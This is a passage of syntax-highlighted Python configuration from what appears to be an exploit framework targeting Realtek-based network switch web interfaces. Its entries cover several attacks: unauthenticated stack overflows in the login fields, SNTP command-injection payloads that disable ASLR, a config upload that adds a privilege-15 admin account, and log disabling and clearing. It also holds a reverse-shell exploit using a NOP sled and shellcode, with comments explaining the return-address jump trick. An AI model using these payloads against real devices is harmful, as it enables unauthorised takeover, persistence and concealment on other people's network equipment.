					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">60</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;STARTUP_BACKUP=1'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=+&amp;sntp_Port=139'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 

					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;STARTUP_BACKUP=1'</span><span class="token punctuation">,</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'Realtek'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'Realtek'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=USERNAME&amp;password=PASSWORD&amp;login=1'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=547'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'LOGGING_SERVICE=0&amp;cmd=5121'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_5132=Clear+file+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_5132=Clear+buffered+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'httpuploadbakcfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "backup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadbakcfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpuploadruncfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httprestorecfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "startup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httprestorecfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Image Signature Error'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'dispatcher.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username=admin&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">184</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;login=1'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'md5'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span> 
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=524&amp;usrName=USERNAME'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=1&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=+&amp;sntp_Port=139&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=0&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>

						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">80</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;login=1&amp;_CMD_'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>

						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">80</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;login=1'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;LOGGING_SERVICE=0'</span><span class="token punctuation">,</span><span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean RAM log CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM log SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">80</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;login=1'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=139'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=+&amp;sntp_Port=139'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 

					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;login=1'</span><span class="token punctuation">,</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
